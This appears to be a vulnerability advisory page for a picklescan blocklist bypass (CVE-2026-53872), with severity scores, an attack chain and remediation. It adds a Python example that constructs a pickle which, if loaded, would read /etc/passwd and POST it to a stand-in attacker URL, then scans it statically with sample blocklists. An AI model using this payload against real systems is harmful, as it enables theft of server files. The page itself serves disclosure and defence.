
picklescan CVE-2026-53872

HIGH
Path Traversal (CWE-22)
2026-06-17 VulnCheck
8.7
CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.5 MEDIUM

Remote attacker delivers a pickle but a user/automation must invoke the scanner on it (UI:R); no auth needed; only confidentiality impact via arbitrary file read.

CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS Vector (Vendor: VulnCheck)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: None
User Interaction: None
Vulnerable System Impact: Confidentiality High, Integrity None, Availability None
Subsequent System Impact: None (SC:N/SI:N/SA:N)
CVSS 4.0 has no Scope metric; the "S:X" at the end of the vector is the undefined Safety supplemental metric, and the SC/SI/SA metrics carry what Scope expressed in 3.1.

Lifecycle Timeline

Source Code Evidence Fetched: Jun 17, 2026 - 16:49 (vuln.today)
Analysis Generated: Jun 17, 2026 - 16:49 (vuln.today)

Description (CVE.org)

picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.

Analysis (AI)

Arbitrary file read affecting picklescan versions before 0.0.35: a malicious pickle can chain standard-library callables (io.FileIO to open a file, urllib.request.urlopen to POST its contents) that the tool's RCE-focused blocklist does not flag, so the artifact is reported clean. picklescan walks the opcode stream with pickletools and does not execute the pickle itself; the read and the exfiltration happen on whichever host trusts that verdict and then deserializes the untrusted model artifact, at which point files such as /etc/passwd are streamed to an attacker-controlled URL. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Craft malicious pickle with io.FileIO + urlopen REDUCE chain
Delivery: Publish pickle to model hub or supply to victim pipeline
Exploit: Victim runs picklescan < 0.0.35 on file
Install: Blocklist misses non-RCE primitives
C2: Unpickling opens /etc/passwd via io.FileIO
Execute: urllib.request.urlopen POSTs file contents to attacker URL
Impact: Sensitive data exfiltrated

Vulnerability Assessment (AI)

Exploitation: Requires that a victim pipeline run picklescan < 0.0.35 against an attacker-controlled pickle, accept the clean verdict, and then load the file (pickle.load, or torch.load with weights_only=False), and that the loading host have outbound network connectivity to the attacker's URL for the urllib.request.urlopen leg of the chain. No authentication or non-default configuration is needed; the only user interaction is invoking the scanner and the load that follows it. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The vendor CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:N gives 8.7, driven entirely by VC:H with VI and VA at N. The impact split is accurate: the bug yields confidentiality loss (file read plus an outbound request to an attacker-chosen URL) but no direct integrity or availability impact. The vuln.today rating of 6.5 differs only on User Interaction (UI:R in 3.1, UI:P in 4.0), because someone or something must run the scanner and load the file. …
Exploit Scenario: An attacker uploads a malicious .pkl file (for example, as part of a model repository on a public ML hub) whose opcode stream reduces to urllib.request.urlopen('https://attacker.example/collect', io.FileIO('/etc/passwd', 'r')), which a crafted pickle expresses as two nested REDUCE calls. A downstream user or automated pipeline runs picklescan against the file expecting a safe/unsafe verdict; the scanner reports it clean, the pipeline loads it, and the unpickler calls io.FileIO to open the target file and urlopen to POST it as the request body to the attacker's endpoint. …
Remediation: Vendor-released patch: picklescan 0.0.35. Upgrade via pip install --upgrade 'picklescan>=0.0.35' and rebuild any container images, CI workers, or Hugging Face integration services that bundle the library. Because picklescan is a blocklist-based detector, treat a clean verdict as a filter rather than proof of safety: avoid deserializing untrusted pickles at all where possible (torch.load(weights_only=True) or a non-pickle weight format) so that the next blocklist gap does not become a file read. … Detailed patch versions, workarounds, and compensating controls in full report.
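The chain and exploit scenario above, as an added example that is not part of the original page and not picklescan's own code: it builds the opcode stream for urlopen(url, io.FileIO(path, 'r')) without ever loading it, then scans it statically with pickletools the way an opcode-walking scanner does, once encoded with GLOBAL (protocol 2) and once with STACK_GLOBAL (protocol 4). The RCE-only and extended blocklists, the state_dict allowlist and the collector URL https://attacker.example/collect are constructed assumptions for illustration and do not reproduce picklescan's real lists; pickletools, the pickle opcode constants and the nested-REDUCE encoding are standard Python.

```python
"""Added example (not picklescan's code): craft the FileIO + urlopen
file-read pickle as raw opcodes, never load it, and scan it statically.
Blocklists, allowlist and collector URL are constructed for illustration."""
import io
import pickle
import pickletools

COLLECTOR_URL = "https://attacker.example/collect"  # assumption: illustrative only


def _ustr(s: str) -> bytes:
    """BINUNICODE opcode: 'X' + 4-byte little-endian length + UTF-8 bytes."""
    b = s.encode("utf-8")
    return pickle.BINUNICODE + len(b).to_bytes(4, "little") + b


def _global(module: str, name: str) -> bytes:
    """GLOBAL opcode (protocol <= 3): 'c' + module + newline + name + newline."""
    return pickle.GLOBAL + f"{module}\n{name}\n".encode("ascii")


def _stack_global(module: str, name: str) -> bytes:
    """STACK_GLOBAL opcode (protocol 4+): push module and name strings, then 0x93."""
    return _ustr(module) + _ustr(name) + pickle.STACK_GLOBAL


def build_file_read_pickle(path: str = "/etc/passwd", url: str = COLLECTOR_URL,
                           proto: int = 2) -> bytes:
    """Opcode stream that, if it were ever unpickled, would evaluate
    urlopen(url, io.FileIO(path, 'r')) as two nested REDUCE calls.
    Only the import opcode differs between protocols; the callables are the same."""
    g = _global if proto < 4 else _stack_global
    return (pickle.PROTO + bytes([proto])
            + g("urllib.request", "urlopen")
            + pickle.MARK + _ustr(url)
            + g("io", "FileIO")
            + pickle.MARK + _ustr(path) + _ustr("r") + pickle.TUPLE + pickle.REDUCE
            + pickle.TUPLE + pickle.REDUCE
            + pickle.STOP)


def is_wellformed(data: bytes) -> bool:
    """Structural check only: pickletools.dis simulates the stack and imports
    or calls nothing."""
    try:
        pickletools.dis(data, out=io.StringIO())
        return True
    except ValueError:
        return False


def referenced_globals(data: bytes) -> list:
    """(module, name) pairs the stream would import, recovered from GLOBAL and
    STACK_GLOBAL opcodes via pickletools.genops. Nothing is executed.
    Simplification: STACK_GLOBAL is resolved from the two most recently pushed
    string constants, which is how a straightforward stream encodes it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # genops joins the pair with a space
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
    return found


# Constructed RCE-focused blocklist of the kind the advisory describes.
RCE_BLOCKLIST = {("os", "system"), ("os", "popen"), ("subprocess", "Popen"),
                 ("subprocess", "run"), ("builtins", "eval"), ("builtins", "exec")}
# The same list extended with the file-read and network primitives this chain uses.
EXTENDED_BLOCKLIST = RCE_BLOCKLIST | {("io", "FileIO"), ("io", "open"),
                                      ("builtins", "open"), ("urllib.request", "urlopen")}
# Constructed allowlist: the globals a plain PyTorch state_dict pickle needs.
SAFE_MODEL_GLOBALS = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2"),
                      ("torch", "FloatStorage")}


def scan_blocklist(data: bytes, blocklist: set) -> list:
    """Flags only callables present on the blocklist (the design that was bypassed)."""
    return sorted(set(referenced_globals(data)) & blocklist)


def scan_allowlist(data: bytes, allowed: set) -> list:
    """Deny by default: flags every global not explicitly allowed."""
    return sorted(set(referenced_globals(data)) - allowed)


if __name__ == "__main__":
    for proto in (2, 4):
        p = build_file_read_pickle(proto=proto)
        print(f"protocol {proto}: well-formed={is_wellformed(p)}")
        print("  RCE-only blocklist flags:", scan_blocklist(p, RCE_BLOCKLIST))
        print("  extended blocklist flags:", scan_blocklist(p, EXTENDED_BLOCKLIST))
        print("  allowlist flags:         ", scan_allowlist(p, SAFE_MODEL_GLOBALS))
```

Run it directly: the RCE-only blocklist returns nothing for both the GLOBAL and the STACK_GLOBAL encoding of the same two callables, which is the bypass the advisory describes, while the extended blocklist and the deny-by-default allowlist flag io.FileIO and urllib.request.urlopen regardless of encoding. Keep the check at the opcode level and never pickle.loads a stream like this to "test" a scanner.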

Recommended Action (AI)

Within 24 hours: Identify and inventory all systems running picklescan versions before 0.0.35 (pip show picklescan on hosts, plus the lockfiles and container images that pin it); until they are upgraded, restrict picklescan-gated loading to internally sourced, trusted model artifacts only. …




CVE-2026-53872 vulnerability details – vuln.today
